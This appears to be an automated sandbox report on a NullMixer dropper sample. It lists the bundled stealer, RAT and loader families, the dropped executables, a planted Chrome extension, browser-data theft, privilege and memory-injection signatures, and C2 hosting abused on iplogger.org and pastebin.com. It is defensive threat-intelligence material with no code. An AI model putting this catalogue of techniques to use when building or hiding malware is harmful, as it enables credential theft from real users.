Malware Analysis Report

2025-01-02 05:58

Sample ID 241122-jcqjqasndn
Target 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe
SHA256 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars chris media21 sehrish aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c

Threat Level: Known bad

The file 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe was found to be: Known bad.

Malicious Activity Summary

fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars chris media21 sehrish aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan

Gcleaner family

RedLine payload

PrivateLoader

OnlyLogger

Onlylogger family

SectopRAT

Socelars family

Sectoprat family

Socelars

NullMixer

Socelars payload

GCleaner

Nullmixer family

RedLine

SectopRAT payload

Fabookie family

Redline family

Privateloader family

Fabookie

Detect Fabookie payload

OnlyLogger payload

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

ASPack v2.12-2.42

Loads dropped DLL

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Looks up geolocation information via web service

Drops Chrome extension

Blocklisted process makes network request

Suspicious use of SetThreadContext

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-22 07:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-22 07:31

Reported

2024-11-22 07:33

Platform

win10v2004-20241007-en

Max time kernel

86s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343342817050" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3124 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
PID 3124 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
